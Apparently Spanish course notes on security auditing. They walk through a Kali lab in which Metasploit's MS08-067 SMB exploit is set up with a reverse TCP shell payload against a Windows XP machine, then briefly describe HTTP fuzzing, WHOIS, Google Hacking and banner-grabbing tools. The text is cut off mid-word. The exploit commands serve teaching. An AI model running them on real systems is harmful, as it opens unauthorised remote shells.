Administración de Sistemas

Cogemos una maquina, le enchufamos el Kali, le habilitamos la red interna y habilitamos Sistema/Habilitar PAE/NX. IP de Kali: 192.168.100.1 IP de Windows XP: 192.168.100.2 Kali es una distribución de Linux muy usada para hacer auditorías. Lo primero que hay que verificar es que se vea el PC de la víctima haciendo un ping a este: # ping -c 1 192.168.100.2 Una vez verificado entramos en el terminal y ejecutamos: # msfconsole Usamos la vulnerabilidad: Podemos usar todos estas vulnerabilidades. > use exploit/windows/smb/ms (doble tabulación) > use exploit/windows/smb/ms08_067_netatapi > show exploits Y el tipo de PLAYLOAD : > set PAYLOAD windows/shell/reverse_tcp > show options   Origen del Ataque y Destino: > set RHOST 192.168.100.2 > set LHOST 192.168.100.1 > set LPORT 4444 > show options

Fuzzing HTTP La herramienta Fuzzing HTTP automatiza el lanzamiento del programa WFUZZ, de “ Edge-Security”, que permitirá localizar ficheros y zonas ocultas en un sitio web, de una manera sencilla y rápida. Por defecto diccionario big.txt, pero podemos probar con otros diccionarios, …   WHOIS La herramienta Whois permitirá ver la información del usuario que ha registrado un dominio. Su uso es sencillo, en primer lugar se introducirá un dominio y después se pulsará el botón “Whois”. Google Hacking La herramienta Google Hacking lleva incorporado un navegador web desde el que se podrán lanzar “queries” típicas de Google Hacking desde cualquiera de sus casillas. Además lleva incorporados escaneos predefinidos. Banner Attack Esta herramienta permite visualizar el banner del servidor web para intentar detectar el tipo de servidor y el sistema operativo utilizado en la organización. Para utilizarl